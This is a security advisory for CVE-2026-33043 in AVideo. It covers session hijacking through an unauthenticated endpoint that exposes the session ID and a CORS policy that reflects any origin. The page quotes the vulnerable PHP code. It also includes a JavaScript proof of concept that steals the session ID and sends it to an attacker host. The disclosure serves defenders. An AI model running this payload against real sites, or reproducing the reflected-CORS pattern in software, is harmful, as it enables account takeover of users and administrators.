CVE-2026-33043

HIGH8.1EPSS 0.02%

AVideo affected by Session Hijacking via Unauthenticated Session ID Disclosure with Permissive CORS

Published: 3/17/2026Modified: 3/20/2026
Also known as:GHSA-qc3p-398r-p59j

Description

### Summary `/objects/phpsessionid.json.php` exposes the current PHP session ID to any unauthenticated request. The `allowOrigin()` function reflects any `Origin` header back in `Access-Control-Allow-Origin` with `Access-Control-Allow-Credentials: true`, enabling cross-origin session theft and full account takeover. ### Details **File:** `objects/phpsessionid.json.php` ```php allowOrigin(); $obj = new stdClass(); $obj->phpsessid = session_id(); echo _json_encode($obj); ``` No authentication is required. The `allowOrigin()` function in `objects/functions.php` (line ~2648) reflects the request Origin: ```php $HTTP_ORIGIN = empty($_SERVER['HTTP_ORIGIN']) ? @$_SERVER['HTTP_REFERER'] : $_SERVER['HTTP_ORIGIN']; header("Access-Control-Allow-Origin: " . $HTTP_ORIGIN); header("Access-Control-Allow-Credentials: true"); ``` This means any external website can make a credentialed cross-origin request and read the session ID. ### PoC An attacker hosts the following page: ```html <script> fetch('https://TARGET/objects/phpsessionid.json.php', { credentials: 'include' }) .then(r => r.json()) .then(d => { // d.phpsessid = victim's session ID document.location = 'https://attacker.com/steal?sid=' + d.phpsessid; }); </script> ``` When a logged-in AVideo user visits the attacker's page, their PHP session ID is stolen via the permissive CORS policy, allowing the attacker to hijack their session. ### Impact **Account Takeover** — Any logged-in user (including administrators) who visits an attacker-controlled page will have their session stolen. The attacker can then impersonate them with full privileges.

Affected packages (1)

CVSS scores

SourceVersionSeverityVector
osvCVSS 3.1HIGH8.1CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

References (4)